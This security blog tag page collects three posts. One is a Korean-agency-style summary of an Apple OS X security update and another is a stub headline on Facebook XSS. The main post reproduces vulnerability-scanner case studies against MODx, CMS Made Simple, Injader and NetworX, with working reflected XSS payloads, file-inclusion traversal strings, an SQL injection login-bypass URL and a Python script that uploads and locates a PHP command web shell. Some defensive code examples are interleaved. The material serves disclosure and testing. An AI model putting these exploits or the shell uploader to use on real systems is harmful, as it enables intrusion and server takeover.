3 posts tagged 'Cross-site Scripting'

2013.09.17 18:38

Apple: OS X Mountain Lion and Security Update

□ Overview
   o Apple has released a security update that resolves multiple vulnerabilities affecting OS X Mountain Lion, its Mac operating system.
   o Because an attacker could cause denial of service and other damage on systems affected by these vulnerabilities, updating to the latest version is recommended.

□ Description
   o Cross-site scripting (XSS) vulnerabilities in Apache on OS X Mountain Lion (CVE-2012-0883, CVE-2012-2687, CVE-2012-3499, CVE-2012-4558)
   o Denial-of-service vulnerabilities in BIND on OS X Mountain Lion (CVE-2012-3817, CVE-2012-4244, CVE-2012-5166, CVE-2012-5688, CVE-2012-2266)
   o Root certificate update for OS X Mountain Lion
   o Multiple vulnerabilities in ClamAV on OS X Mountain Lion that may lead to arbitrary code execution (CVE-2013-2020, CVE-2013-2021)
   o Buffer overflow vulnerability in CoreGraphics on OS X Mountain Lion that may lead to arbitrary code execution (CVE-2013-1025)
   o Buffer overflow vulnerability in ImageIO on OS X Mountain Lion that may lead to arbitrary code execution (CVE-2013-1026)
   o Dialog vulnerability in Installer on OS X Mountain Lion that allows a package to be opened even after its certificate has been revoked (CVE-2013-1027)
   o Vulnerability in the certificate verification process of IPSec on OS X Mountain Lion (CVE-2013-1028)
   o Denial-of-service vulnerability in the Kernel on OS X Mountain Lion (CVE-2013-1029)
   o Vulnerability in Mobile Device Management on OS X Mountain Lion arising during communication over a pipe (CVE-2013-1030)
   o Multiple vulnerabilities in OpenSSL on OS X Mountain Lion (CVE-2012-2686, CVE-2013-0166, CVE-2013-0169)
   o Multiple vulnerabilities in PHP on OS X Mountain Lion that may lead to arbitrary code execution (CVE-2013-1635, CVE-2013-1643, CVE-2013-1824, CVE-2013-2110)
   o Multiple vulnerabilities in PostgreSQL on OS X Mountain Lion that may lead to data corruption (CVE-2013-1899, CVE-2013-1900, CVE-2013-1901)
   o Vulnerability in Power Management on OS X Mountain Lion arising from a power-settings lock issue (CVE-2013-1031)
   o Vulnerability in QuickTime on OS X Mountain Lion that may lead to memory corruption (CVE-2013-1032)
   o Vulnerability in Screen Lock on OS X Mountain Lion in the handling of a session's screen lock (CVE-2013-1033)
   o Vulnerability in sudo on OS X Mountain Lion arising from an incorrect timestamp check (CVE-2013-1775)


□ Affected Systems
   o Affected software
    - Mac OS X v10.6.8
    - Mac OS X Server v10.6.8
    - OS X Lion v10.7.5
    - OS X Lion Server v10.7.5
    - OS X Mountain Lion v10.8 through v10.8.4


□ Resolution
   o Update to OS X Mountain Lion 10.8.5 and Security Update 2013-004 (via the update notification)
    ① When the update notification appears, select [Update] to proceed with the software update

   o Update to OS X Mountain Lion 10.8.5 and Security Update 2013-004 (direct install from the website)
    ① Download the matching version from http://support.apple.com/downloads/ and proceed with the update

   o Update to OS X Mountain Lion 10.8.5 and Security Update 2013-004 (via the Mac App Store)
    ① Select [Software Update] from the Apple menu
    ② In the Mac App Store, select [Update] for the relevant software to proceed with the update


□ Glossary
   o OS X Mountain Lion: an operating system developed by Apple that integrates its mobile products with the Mac


□ Other Inquiries
   o KISA (Korea Internet & Security Agency) Internet Incident Response Center: dial 118 (no area code)


[Reference Sites]
[1] http://support.apple.com/kb/HT5880


2011.11.21 20:48

PHP Vulnerability Hunter

All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown, followed by the exploit proofs of concept and the resulting advisories.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Original Advisory


Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

# 32 levels of '../' followed by a NUL byte, matching the log entry above
lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
Original Advisory
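A server-side check for the two traversal cases above (MODx's class_key and CMS Made Simple's default_cms_lang), written here as an added example in Python rather than as either application's own PHP; the base directory, the allow-list pattern and the sample inputs are assumptions, not code from either project:

```python
import os
import re

# Values such as a language code or a class key never legitimately contain
# path separators, so an allow-list is the primary control (assumed pattern).
KEY_RE = re.compile(r'^[A-Za-z0-9_]{1,32}$')


def resolve_include(base_dir, key, ext='.php'):
    """Map an untrusted key to a file under base_dir; return None if unsafe.

    Rejects NUL bytes (the %00 truncation both log entries rely on), rejects
    anything outside the allow-list, and as a second layer verifies that the
    canonical path is still inside base_dir.
    """
    if not isinstance(key, str) or '\x00' in key:
        return None
    if not KEY_RE.match(key):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, key + ext))
    # realpath collapses '..' and symlinks, so containment is a prefix test
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def classify(base_dir, keys):
    """Return {key: True/False} saying which candidate values would be served."""
    return {k: resolve_include(base_dir, k) is not None for k in keys}


# Constructed sample inputs: the scanner's two payloads beside legitimate keys
SAMPLES = [
    'en_US',
    'modResource',
    '../' * 32 + 'windows/win.ini\x00',
    '../' * 32 + 'lfi_test.txt\x00',
    '..\\..\\windows\\win.ini',
]

if __name__ == '__main__':
    for key, ok in classify('/var/www/cmsms/lang', SAMPLES).items():
        print('%-40r %s' % (key[:36], 'served' if ok else 'rejected'))
```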


Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Injection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
Original Advisory
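Added example, not Injader's code: the concatenated query shown in the error page beside a parameterized one, run against an in-memory SQLite stand-in for maj_users. SQLite does not treat backslash as an escape character, so this illustrates the concatenation pattern rather than the exact MySQL behaviour; the table contents and the decoded un= value (assumed to carry a single backslash) are constructed.

```python
import sqlite3


def setup_db():
    """Constructed in-memory stand-in for the maj_users table named in the error page."""
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE maj_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)')
    db.executemany('INSERT INTO maj_users VALUES (?, ?, ?)',
                   [(1, 'admin', 'secret'), (2, 'editor', 'secret2')])
    return db


def lookup_unsafe(db, username):
    # The pattern behind "Your query was: SELECT ... WHERE username = '\'":
    # the request value is spliced into the SQL text, so quotes in it are SQL.
    sql = "SELECT username, id FROM maj_users WHERE username = '%s'" % username
    return db.execute(sql).fetchall()


def lookup_safe(db, username):
    # Placeholder binding: the value is passed to the driver separately and is
    # never parsed as SQL, whatever quotes or backslashes it contains.
    sql = 'SELECT username, id FROM maj_users WHERE username = ?'
    return db.execute(sql, (username,)).fetchall()


# Decoded un= value from the proof-of-concept URL (constructed, single backslash)
POC_USERNAME = "\\' or id=1 and 'a'='a"

if __name__ == '__main__':
    db = setup_db()
    # AND binds tighter than OR, so the concatenated form matches the id=1 row
    print('concatenated :', lookup_unsafe(db, POC_USERNAME))   # [('admin', 1)]
    print('parameterized:', lookup_safe(db, POC_USERNAME))     # []
```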


Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    # Raw multipart POST; adjacent string literals are joined by the parser
    s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    # Only the status line is checked
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else:
        print 'shell uploaded'

    shell_path = path + '/tmp/shell.php'

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]:
        print 'shell not found'
    else:
        print 'shell located at http://' + host + shell_path

upload_shell()
Original Advisory
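Added example, not PHP Vulnerability Hunter's own code: a webroot snapshot diff that raises the equivalent of the "Arbitrary File Event" alert above when a request creates or rewrites a server-side script such as tmp/shell.php; the extension list and the constructed temporary webroot are assumptions.

```python
import os
import tempfile

# Extensions the web server would execute; anything new here is suspect (assumed list)
SCRIPT_EXT = {'.php', '.phtml', '.php5', '.phar'}


def snapshot(root):
    """Map relative path -> (size, mtime_ns) for every file under root."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            snap[rel] = (st.st_size, st.st_mtime_ns)
    return snap


def file_events(before, after):
    """Return sorted (path, kind) pairs for scripts that appeared or changed.

    Taking one snapshot before and one after each request is what turns an
    upload bug into an 'Arbitrary File Event' alert: the server wrote a
    script under the webroot in response to an HTTP request.
    """
    events = []
    for path, meta in after.items():
        if os.path.splitext(path)[1].lower() not in SCRIPT_EXT:
            continue
        if path not in before:
            events.append((path, 'Created'))
        elif before[path] != meta:
            events.append((path, 'Changed'))
    return sorted(events)


def demo():
    """Constructed webroot: a request drops tmp/shell.php and rewrites about.php."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'tmp'))
        with open(os.path.join(root, 'about.php'), 'w') as f:
            f.write('<?php echo "about"; ?>')
        with open(os.path.join(root, 'tmp', 'notes.txt'), 'w') as f:
            f.write('not a script')
        before = snapshot(root)
        with open(os.path.join(root, 'tmp', 'shell.php'), 'w') as f:
            f.write('<?php /* uploaded */ ?>')
        with open(os.path.join(root, 'about.php'), 'w') as f:
            f.write('<?php echo "about, rewritten"; ?>')
        with open(os.path.join(root, 'tmp', 'notes.txt'), 'w') as f:
            f.write('still not a script')
        return file_events(before, snapshot(root))
```

Running demo() returns [('about.php', 'Changed'), ('tmp/shell.php', 'Created')]; the rewritten notes.txt is ignored because it is not a script.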

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory
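Added example, not code from MODx, NetworX or the scanner: the unsafe hidden-input rendering seen in both reflected XSS log entries (modahsh in case study 1, GroupID here) beside an attribute-escaped version, plus a reflection check of the kind behind the "Reflected XSS" alert. The proof-of-concept URL from this case study is the sample input; the function names are assumptions.

```python
import html
from urllib.parse import parse_qsl, urlsplit


def render_hidden_unsafe(name, value):
    # The pattern behind both log entries: the raw parameter lands inside a
    # double-quoted attribute, so a value beginning with '">' closes the
    # attribute and the tag, and the remainder is parsed as markup.
    return '<input type="hidden" name="%s" value="%s" />' % (name, value)


def render_hidden_safe(name, value):
    # Attribute context: quote=True turns '"' into &quot; besides <, > and &.
    return '<input type="hidden" name="%s" value="%s" />' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def reflected_params(url, body):
    """Names of query parameters whose decoded value reappears verbatim in body.

    This is the check behind the scanner's 'Reflected XSS' alert: a marker
    containing '<' is sent in each parameter and the response is searched for
    the unencoded string.
    """
    query = urlsplit(url).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if '<' in value and value in body]


# Sample input: the proof-of-concept URL from this case study
POC_URL = ('http://localhost/networx/group_connections_list_popup.php'
           '?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E')


def check(url, renderer):
    """Render the GroupID field from the URL's group_id and report reflections."""
    params = dict(parse_qsl(urlsplit(url).query))
    body = renderer('GroupID', params.get('group_id', ''))
    return body, reflected_params(url, body)


if __name__ == '__main__':
    for renderer in (render_hidden_unsafe, render_hidden_safe):
        body, hits = check(POC_URL, renderer)
        print(renderer.__name__, '->', hits or 'no reflection')
        print('   ', body)
```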


Source: autosectools.com

2010.11.09 15:04

(Video) Discovered XSS on Facebook can lead to account hijack



Source: http://www.acunetix.com/
